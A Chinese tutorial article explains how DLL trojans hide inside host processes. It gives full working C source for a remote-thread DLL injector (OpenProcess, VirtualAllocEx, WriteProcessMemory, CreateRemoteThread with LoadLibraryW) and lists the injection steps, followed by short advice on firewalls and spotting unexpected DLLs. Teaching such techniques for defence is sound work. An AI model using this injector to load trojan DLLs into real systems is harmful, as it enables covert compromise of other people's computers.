從前文可知,DLL在程序編制中可作出巨大貢獻(xiàn),它提供了具共性代碼的復(fù)用能力。但是,正如一門高深的武學(xué),若被掌握在正義之俠的手上,便可助其仗義江湖;但若被掌握在邪惡之徒的手上,則必然在江湖上掀起腥風(fēng)血雨。DLL正是一種這樣的武學(xué)。DLL一旦染上了魔性,就不再是正常的DLL程序,而是DLL木馬,一種惡貫滿盈的病毒,令特洛伊一夜之間國破家亡。
DLL木馬的原理
DLL木馬的實(shí)現(xiàn)原理是編程者在DLL中包含木馬程序代碼,隨后在目標(biāo)主機(jī)中選擇特定目標(biāo)進(jìn)程,以某種方式強(qiáng)行指定該進(jìn)程調(diào)用包含木馬程序的DLL,最終達(dá)到侵襲目標(biāo)系統(tǒng)的目的。
正是DLL程序自身的特點(diǎn)決定了以這種形式加載木馬不僅可行,而且具有良好的隱藏性:
(1)DLL程序被映射到宿主進(jìn)程的地址空間中,它能夠共享宿主進(jìn)程的資源,并根據(jù)宿主進(jìn)程在目標(biāo)主機(jī)的級(jí)別非法訪問相應(yīng)的系統(tǒng)資源;
(2)DLL程序沒有獨(dú)立的進(jìn)程地址空間,從而可以避免在目標(biāo)主機(jī)中留下"蛛絲馬跡",達(dá)到隱蔽自身的目的。
DLL木馬實(shí)現(xiàn)了"真隱藏",我們在任務(wù)管理器中看不到木馬"進(jìn)程",它完全溶進(jìn)了系統(tǒng)的內(nèi)核。與"真隱藏"對應(yīng)的是"假隱藏","假隱藏"木馬把自己注冊成為一個(gè)服務(wù)。雖然在任務(wù)管理器中也看不到這個(gè)進(jìn)程,但是"假隱藏"木馬本質(zhì)上還具備獨(dú)立的進(jìn)程空間。"假隱藏"只適用于Windows9x的系統(tǒng),對于基于WINNT的操作系統(tǒng),通過服務(wù)管理器,我們可以發(fā)現(xiàn)系統(tǒng)中注冊過的服務(wù)。
DLL木馬注入其它進(jìn)程的方法為遠(yuǎn)程線程插入。
遠(yuǎn)程線程插入技術(shù)指的是通過在另一個(gè)進(jìn)程中創(chuàng)建遠(yuǎn)程線程的方法進(jìn)入那個(gè)進(jìn)程的內(nèi)存地址空間。將木馬程序以DLL的形式實(shí)現(xiàn)后,需要使用插入到目標(biāo)進(jìn)程中的遠(yuǎn)程線程將該木馬DLL插入到目標(biāo)進(jìn)程的地址空間,即利用該線程通過調(diào)用Windows API LoadLibrary函數(shù)來加載木馬DLL,從而實(shí)現(xiàn)木馬對系統(tǒng)的侵害。
DLL木馬注入程序
這里涉及到一個(gè)非常重要的Windows API――CreateRemoteThread。與之相比,我們所習(xí)慣使用的CreateThread API函數(shù)只能在進(jìn)程自身內(nèi)部產(chǎn)生一個(gè)新的線程,而且被創(chuàng)建的新線程與主線程共享地址空間和其他資源。而CreateRemoteThread則不同,它可以在另外的進(jìn)程中產(chǎn)生線程!CreateRemoteThread有如下特點(diǎn):
(1)CreateRemoteThread較CreateThread多一個(gè)參數(shù)hProcess,該參數(shù)用于指定要?jiǎng)?chuàng)建線程的遠(yuǎn)程進(jìn)程,其函數(shù)原型為:
HANDLE CreateRemoteThread(
HANDLE hProcess, //遠(yuǎn)程進(jìn)程句柄
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
);
(2)線程函數(shù)的代碼不能位于我們用來注入DLL木馬的進(jìn)程所在的地址空間中。也就是說,我們不能想當(dāng)然地自己寫一個(gè)函數(shù),并把這個(gè)函數(shù)作為遠(yuǎn)程線程的入口函數(shù);
(3)不能把本進(jìn)程的指針作為CreateRemoteThread的參數(shù),因?yàn)楸具M(jìn)程的內(nèi)存空間與遠(yuǎn)程進(jìn)程的不一樣。
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
void CheckError ( int, int, char *); //出錯(cuò)處理函數(shù)
PDWORD pdwThreadId;
HANDLE hRemoteThread, hRemoteProcess;
DWORD fdwCreate, dwStackSize, dwRemoteProcessId;
PWSTR pszLibFileRemote=NULL;
void main(int argc,char **argv)
{
int iReturnCode;
char lpDllFullPathName[MAX_PATH];
WCHAR pszLibFileName[MAX_PATH]={0};
dwRemoteProcessId = 4000;
strcpy(lpDllFullPathName, "d:\\troydll.dll");
//將DLL文件全路徑的ANSI碼轉(zhuǎn)換成UNICODE碼
iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,
lpDllFullPathName, strlen(lpDllFullPathName),
pszLibFileName, MAX_PATH);
CheckError(iReturnCode, 0, "MultByteToWideChar");
//打開遠(yuǎn)程進(jìn)程
hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允許創(chuàng)建線程
PROCESS_VM_OPERATION | //允許VM操作
PROCESS_VM_WRITE, //允許VM寫
FALSE, dwRemoteProcessId );
CheckError( (int) hRemoteProcess, NULL, "Remote Process not Exist or Access Denied!");
//計(jì)算DLL路徑名需要的內(nèi)存空間
int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);
pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE);
CheckError((int)pszLibFileRemote, NULL, "VirtualAllocEx");
//將DLL的路徑名復(fù)制到遠(yuǎn)程進(jìn)程的內(nèi)存空間
iReturnCode = WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);
CheckError(iReturnCode, false, "WriteProcessMemory");
//計(jì)算LoadLibraryW的入口地址
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
CheckError((int)pfnStartAddr, NULL, "GetProcAddress");
//啟動(dòng)遠(yuǎn)程線程,通過遠(yuǎn)程線程調(diào)用用戶的DLL文件
hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL);
CheckError((int)hRemoteThread, NULL, "Create Remote Thread");
//等待遠(yuǎn)程線程退出
WaitForSingleObject(hRemoteThread, INFINITE);
//清場處理
if (pszLibFileRemote != NULL)
{
VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
}
if (hRemoteThread != NULL)
{
CloseHandle(hRemoteThread );
}
if (hRemoteProcess!= NULL)
{
CloseHandle(hRemoteProcess);
}
}
//錯(cuò)誤處理函數(shù)CheckError()
void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)
{
if(iReturnCode==iErrorCode)
{
printf("%s Error:%d\n\n", pErrorMsg, GetLastError());
//清場處理
if (pszLibFileRemote != NULL)
{
VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
}
if (hRemoteThread != NULL)
{
CloseHandle(hRemoteThread );
}
if (hRemoteProcess!= NULL)
{
CloseHandle(hRemoteProcess);
}
exit(0);
}
}
從DLL木馬注入程序的源代碼中我們可以分析出DLL木馬注入的一般步驟為:
(1)取得宿主進(jìn)程(即要注入木馬的進(jìn)程)的進(jìn)程ID dwRemoteProcessId;
(2)取得DLL的完全路徑,并將其轉(zhuǎn)換為寬字符模式pszLibFileName;
(3)利用Windows API OpenProcess打開宿主進(jìn)程,應(yīng)該開啟下列選項(xiàng):
a.PROCESS_CREATE_THREAD:允許在宿主進(jìn)程中創(chuàng)建線程;
b.PROCESS_VM_OPERATION:允許對宿主進(jìn)程中進(jìn)行VM操作;
c.PROCESS_VM_WRITE:允許對宿主進(jìn)程進(jìn)行VM寫。
(4)利用Windows API VirtualAllocEx函數(shù)在遠(yuǎn)程線程的VM中分配DLL完整路徑寬字符所需的存儲(chǔ)空間,并利用Windows API WriteProcessMemory函數(shù)將完整路徑寫入該存儲(chǔ)空間;
(5)利用Windows API GetProcAddress取得Kernel32模塊中LoadLibraryW函數(shù)的地址,這個(gè)函數(shù)將作為隨后將啟動(dòng)的遠(yuǎn)程線程的入口函數(shù);
(6)利用Windows API CreateRemoteThread啟動(dòng)遠(yuǎn)程線程,將LoadLibraryW的地址作為遠(yuǎn)程線程的入口函數(shù)地址,將宿主進(jìn)程里被分配空間中存儲(chǔ)的完整DLL路徑作為線程入口函數(shù)的參數(shù)以另其啟動(dòng)指定的DLL;
(7)清理現(xiàn)場。
DLL木馬的防治
從DLL木馬的原理和一個(gè)簡單的DLL木馬程序中我們學(xué)到了DLL木馬的工作方式,這可以幫助我們更好地理解DLL木馬病毒的防治手段。
一般的木馬被植入后要打開一網(wǎng)絡(luò)端口與攻擊程序通信,所以防火墻是抵御木馬攻擊的最好方法。防火墻可以進(jìn)行數(shù)據(jù)包過濾檢查,我們可以讓防火墻對通訊端口進(jìn)行限制,只允許系統(tǒng)接受幾個(gè)特定端口的數(shù)據(jù)請求。這樣,即使木馬植入成功,攻擊者也無法進(jìn)入到受侵系統(tǒng),防火墻把攻擊者和木馬分隔開來了。
對于DLL木馬,一種簡單的觀察方法也許可以幫助用戶發(fā)現(xiàn)之。我們查看運(yùn)行進(jìn)程所依賴的DLL,如果其中有一些莫名其妙的DLL,則可以斷言這個(gè)進(jìn)程是宿主進(jìn)程,系統(tǒng)被植入了DLL木馬。"道高一尺,魔高一丈",現(xiàn)如今,DLL木馬也發(fā)展到了更高的境界,它們看起來也不再"莫名其妙"。在最新的一些木馬里面,開始采用了先進(jìn)的DLL陷阱技術(shù),編程者用特洛伊DLL替換已知的系統(tǒng)DLL。特洛伊DLL對所有的函數(shù)調(diào)用進(jìn)行過濾,對于正常的調(diào)用,使用函數(shù)轉(zhuǎn)發(fā)器直接轉(zhuǎn)發(fā)給被替換的系統(tǒng)DLL;對于一些事先約定好的特殊情況,DLL會(huì)執(zhí)行一些相應(yīng)的操作。
本文給出的只是DLL木馬最簡單情況的介紹,讀者若有興趣深入研究,可以參考其它資料。
聯(lián)系客服